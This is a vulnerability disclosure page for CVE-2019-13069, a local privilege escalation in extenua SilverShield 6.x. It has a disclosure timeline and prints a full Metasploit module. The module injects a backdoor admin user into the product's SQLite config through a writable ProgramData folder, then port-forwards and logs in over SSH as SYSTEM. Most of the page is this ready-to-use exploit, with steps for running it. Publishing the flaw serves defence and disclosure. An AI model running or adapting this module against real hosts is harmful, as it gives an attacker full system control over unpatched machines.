CVE-2019-13069

CVE-2019-13069 - extenua SilverShield 6.x local priviledge escalation

Disclosure timeline:

  • 10 Dec 2018 (000 days) - Initial contact attempt via vendor website 'contact form'
  • 13 Dec 2018 (000 days) - Second contact attempt via licensing email address on website
  • 13 Dec 2018 (000 days) - Answer from vendor via licensing email address
  • 15 Dec 2018 (002 days) - POC details sent to vendor
  • 17 Dec 2018 (004 days) - Vendor confirms back that they can replicate issue and fix is required
  • 26 Mar 2019 (103 days) - Requested update from vendor
  • 26 Mar 2019 (103 days) - Vendor indicated fix would be up on website within the week
  • 16 Jun 2019 (185 days) - CVE requested from Mitre
  • 30 Jun 2019 (199 days) - CVE number assigned, CVE-2019-13069
  • 01 Jul 2019 (200 days) - No fix/update on vendor website. Requested an update from vendor via licensing email address. No answer
  • 05 Jul 2019 (204 days) - No fix/update on vendor website. Requested an update from vendor via info email address. No answer
  • 31 Jul 2019 (230 days) - public disclosure below. No fix/update on vendor website

Overview:

  • Exploit Title: extenua SilverShield 6.x local priviledge escalation
  • Exploit Author: Ian Bredemeyer
  • Vendor Homepage: https://www.extenua.com
  • Software Link: https://www.extenua.com/silvershield
  • Version: 6.x
  • NOTE: Vendor has pulled software from site. Use wayback machine SilverShield_from_Archive
  • POC tested and works on: Windows7 x64, Windows7 x86, Windows Server 2012 x64, Windows10 x64, Windows Server 2016 x64
  • CVE: CVE-2019-13069
  • exploit-db: /exploits/47197
  • Download the PDF that walks you through the manual way CVE-2019-13069.PDF
  • Download and read the source code for a neat metasploit module below (also available on exploit-db)

  • SilverShield fails to secure its "ProgramData" folder leading to FULL SYSTEM COMPROMISE via Local Privilege Escalation
  • At the time of public disclosure there is no fix/patch. The vendor has not resolved the issue after 230 days
  • NOTE: Vendor has pulled software from site. Use wayback machine SilverShield_from_Archive

Really need a contact? then you must read the Terms and Conditions

Metasploit, on Kali

  • Copy source to ~/.msf4/modules/exploits/windows/local/silvershield.rb, followed by an 'updatedb'
  • Get a meterpreter session to victim (even guest is enough)
  • Enjoy the LPE
Responsive image

Complete source for metasploit module "silvershield.rb". Download available HERE


##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Exploit Title: extenua SilverSHielD 6.x local priviledge escalation
# Exploit Author: Ian Bredemeyer
# Vendor Homepage: https://www.extenua.com
# Software Link: https://www.extenua.com/silvershield
# NOTE: Vendor has pulled software from site.  Use wayback machine https://web.archive.org/web/20180806161702/https://www.extenua.com/silvershield
# Version: 6.x
# POC tested and works on: Windows7 x64, Windows7 x86, Windows Server 2012 x64, Windows10 x64, Windows Server 2016 x64
# CVE: CVE-2019-13069

# More Info: https://www.fobz.net/adv/ag47ex/info.html

require 'sqlite3'
require 'net/ssh'
require 'net/ssh/command_stream'
require 'tempfile'
require 'securerandom'
require 'digest'


class MetasploitModule < Msf::Exploit::Local
  Rank = GoodRanking

  include Post::File
  include Msf::Exploit::Remote::SSH
  include Msf::Post::Windows::Services
  include Msf::Post::Windows::FileInfo

  def initialize(info={})
    super( update_info(info,
      'Name'          => 'Extenua SilverSHielD 6.x local privilege escalation',
      'Description'   => %q{
        Extenua SilverShield 6.x fails to secure its ProgramData subfolder.
        This module exploits this by injecting a new user into the database and then
        using that user to login the SSH service and obtain SYSTEM. 
        This results in to FULL SYSTEM COMPROMISE. 
        At time of discolsure, no fix has been issued by vendor.
      },
      'Author'        => [
        'Ian Bredemeyer',
        ],
      'Platform'      => [ 'win','unix' ],  # 'unix' is needed, otherwise the Payload is flagged as incompatible
      'SessionTypes'  => [ 'meterpreter' ],
      'Targets'       => [
        [ 'Universal', {} ],
      ],
      'Payload'     =>
        {
          'Compat'  => {
            'PayloadType'    => 'cmd_interact',
            'ConnectionType' => 'find',
          },
        },
      'DefaultTarget' => 0,
      'References'    => [
        [ 'CVE', '2019-13069' ],
        [ 'URL', 'https://www.fobz.net/adv/ag47ex/info.html' ],
        [ 'URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13069' ]
      ],
      'DisclosureDate'=> "Jul 31 2019",
      'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
    ))

    register_options([
      OptPort.new('PF_PORT', [ true, 'Local port to PortFwd to victim', 20022 ]),
      OptString.new('SS_IP', [ false, 'IP address SilverShield is listening on at the victim. Leave blank to detect.', '' ]),
      OptPort.new('SS_PORT', [ false, 'Port SilverShield is listening on at the victim.  Leave at 0 to detect.', 0 ]),
      OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
      OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 15])
    ])
  end

  

  # Grabbed this bit from another exploit I was pulling apart... Need to trick the SSH session a bit
  module ItsAShell
    def _check_shell(*args)
      true
    end
  end
  
  
  
  # helper methods that normally come from Tcp
  def rhost
    return '127.0.0.1'
  end
  def rport
    datastore['PF_PORT']
  end

  

  # Does a basic check of SilverShield... Does not fail if there is a problem, but will return false
  def do_check_internal()
  
    looks_ok = true    # lets assume everything is OK...
  
    # Try to get the path of the SilverShield service...
    ss_serviceinfo = service_info("SilverShield")
    ss_servicepath = ss_serviceinfo[:path]
    if (ss_servicepath == '')
        print_warning("Vulnerable Silvershield service is likely NOT running on the target system")
        looks_ok = false
    else
        print_good("Silvershield service found: " + ss_servicepath)
    end


    # Try to read the version of Silvershield from the resigstry of the victim...
    ss_version = ""
    begin
      ss_version = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'SOFTWARE\\extenua\\SilverShield', KEY_READ).query_value("Version").data
    rescue ::Exception => e
      print_warning "Cannot find SilverShield version in registry.  Victim may not have vulnerable SilverShield installed"
      looks_ok = false
    end
    if ss_version != ""
      print_good("Silvershield version from registry: " + ss_version)
      if ss_version[0..1] != "6."    # If not version "6." something ?  then this will not work...
        print_warning("This version is not likely vulnerable to this module")
        looks_ok = false
      end      
    end  
    return looks_ok
    
  end
  
 
  
  
  # Attempts a single SSH login to the victim via the local port forwarded to fictim.  Returns valid connection if OK
  def do_login()
    factory = Rex::Socket::SSHFactory.new(framework,self, datastore['Proxies'])
    opt_hash = {
      :auth_methods    => ['password'],
      :port            => rport,
      :use_agent       => false,
      :config          => false,
      :proxy           => factory,
      :password        => @@the_password,
      :non_interactive => true,
      :verify_host_key => :never
    }
    opt_hash.merge!(:verbose => :debug) if datastore['SSH_DEBUG']
    begin
      ssh_socket = nil
      ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
        ssh_socket = Net::SSH.start(rhost, 'haxor4', opt_hash)
      end
    rescue Rex::ConnectionError
      return
    rescue Net::SSH::Disconnect, ::EOFError
      print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"
      return
    rescue ::Timeout::Error
      print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
      return
    rescue Net::SSH::AuthenticationFailed
      print_error "#{rhost}:#{rport} SSH - Failed authentication"
    rescue Net::SSH::Exception => e
      print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"
      return
    end

    if ssh_socket
      # Create a new session from the socket, then dump it.
      conn = Net::SSH::CommandStream.new(ssh_socket)
      ssh_socket = nil
      return conn
    else
      return false
    end
  end

  
  
  # Attempts several times to connect through session back to SilverShield as haxor then open resulting shell as a new session.
  def exploit_sub
    x = 0
    while x < 5 do 
        x = x + 1
        print_status "SSH login attempt " + x.to_s + ".  May take a moment..."

        conn = do_login()
        if conn
          print_good "Successful login.  Passing to handler..."
          handler(conn.lsock)
          return true
        end
    end     
    return false
  end


  
  def check()
    if do_check_internal
        Exploit::CheckCode::Appears
    else
        Exploit::CheckCode::Safe
    end
  end
  
  
  
  # The guts of it...
  def exploit
  
    # Some basic setup...
    payload_instance.extend(ItsAShell)
    factory = ssh_socket_factory
    
    
    # Do a quick check... well, sort of, just shows info.  We won't stop, just report to user...
    do_check_internal()
    
    
    # We will generate a NEW password and salt.  Then get the relevant hash to inject...
    @@the_password = SecureRandom.hex
    @@the_password_salt = SecureRandom.hex[0..7]
    @@the_password_hash = Digest::MD5.hexdigest @@the_password_salt + @@the_password
    vprint_status("generated- user:haxor4  password:" + @@the_password + " salt:" + @@the_password_salt + " => hash(md5):" + @@the_password_hash)


    # Get a tempfile on the local system.  Garbage collection will automaticlly kill it off later...
    # This is a temp location where we will put the sqlite database so we can work on it on the local machine...
    tfilehandle = Tempfile.new('ss.db.')
    tfilehandle.close
    wfile = tfilehandle.path


    #Try to get the ProgramData path from the victim, this is where the SQLite databasae is held...
    progdata = session.fs.file.expand_path("%ProgramData%")    # client.sys.config.getenv('PROGRAMDATA')
    print_status 'Remote %ProgramData% = ' + progdata


    # Lets check the file exists, then download from the victim to the local file system...
    filecheck = progdata + '\SilverShield\SilverShield.config.sqlite'
    fsrc = filecheck
    fdes = wfile  
    print_status 'Try download: ' + fsrc + '  to: ' + fdes
    begin
      ::Timeout.timeout(5) do
            session.fs.file.download_file(fdes, fsrc)
      end
    rescue ::Exception => e
      print_error "Cannot download #{fsrc} to #{fdes}  #{e.class} : #{e.message}"
      print_error "Does victim even have vulnerable SilverShield installed ?"
      fail_with(Failure::Unknown, "Fail download")
    end


    # Try to connect with sqlite locally...
    vprint_status 'Trying to open database ' + wfile
    db = SQLite3::Database.open wfile


    # Remove haxor4 if its already there, just incase by pure chance a user with that name already exists...
    vprint_status 'remove user "haxor4" if its already in there...'
    results = db.execute "delete from USERS where vcusername='haxor4'"
    answer = ""
    results.each { |row| answer = answer + row.join(',') }


    # Insert the haxor user... we will use this later to connect back in as SYSTEM
    vprint_status 'insert user "haxor4" with password "' + @@the_password + '" into database'
    results = db.execute "INSERT INTO USERS (CUSERID, VCUSERNAME, CSALT,CPASSWORD, VCHOMEDIR, BGETFILE, BPUTFILE, BDELFILE, BMODFILE, BRENFILE, BLISTDIR, BMAKEDIR, BDELDIR, BRENDIR, IAUTHTYPES, BAUTHALL, BALLOWSSH, BALLOWSFTP, BALLOWFWD, BALLOWDAV, IACCOUNTSTATUS, BAUTODISABLE, DTAUTODISABLE, BWINPASSWD, BISADMIN)VALUES(\"{11112222-3333-4444-5555666677778888}\",\"haxor4\",\"" + @@the_password_salt + "\",\"" + @@the_password_hash + "\",\"c:\\\",1,1,1,1,1,1,1,1,1,20,0,1,0,0,0,0,0,-700000.0, 0, 1);"
    answer = ""
    results.each { |row| answer = answer + row.join(',') }
    print_good 'user inserted OK'


    # Dump out local port that SilverShield has been configured to listen on at the victim machine...
    results = db.execute "select IPORT from maincfg"
    answer = ""
    results.each { |row| answer = answer + row.join(',') }
    ss_port = answer
    print_status "SilverShield config shows listening on port: " + ss_port
    if (datastore['SS_PORT'] != 0) 
        ss_port = datastore['SS_PORT'].to_s
        print_status "SS_PORT setting forcing port to " + ss_port
    end
    if (ss_port == '')
        ss_port = '22'
    end


    # Dump out local IP that SilverShield has been configured to listen on at the victim machine...
    results = db.execute "select CBINDIP from maincfg"
    answer = ""
    results.each { |row| answer = answer + row.join(',') }
    ss_ip = answer
    print_status "SilverShield config shows listening on local IP: " + ss_ip
    if (datastore['SS_IP'] != '') 
        ss_ip = datastore['SS_IP']
        print_status "SS_IP setting forcing IP to " + ss_ip
    end
    # If the override AND the detection have come up with nothing, then use the default 127.0.0.1
    if (ss_ip == '') 
        ss_ip = '127.0.0.1'
    end


    # Close the database. Keep it neat
    db.close


    # Now lets upload this file back to the victim...due to bad folder permissions, we can sneak our bad config back in.  Yay
    fdes = filecheck  
    fsrc = wfile
    print_status 'Sending modded file back to victim' 
    begin
      ::Timeout.timeout(5) do
            session.fs.file.upload_file(fdes, fsrc)
      end
    rescue ::Exception => e
      print_error "Cannot upload #{fsrc} to #{fdes}  #{e.class} : #{e.message}"
      print_error "Perhaps this server is not vulnerable or has some other mitigation."
      fail_with(Failure::Unknown, "Fail upload")
    end
    sleep 4   # wait a few seconds... this gives the SilverShield service some time to see the settings have changed.


    # Delete the port if its already pointing somewhwere...  This a bit ugly and may generate an error, but I don't care.
    client.run_cmd("portfwd delete -l " + datastore['PF_PORT'].to_s)


    # Forward a local port through to the ssh port on the victim. 
    client.run_cmd("portfwd add -l " + datastore['PF_PORT'].to_s + " -p " + ss_port + " -r " + ss_ip)


    # Now do ssh work and hand off the session to the handler...
    exploit_sub

  end 

end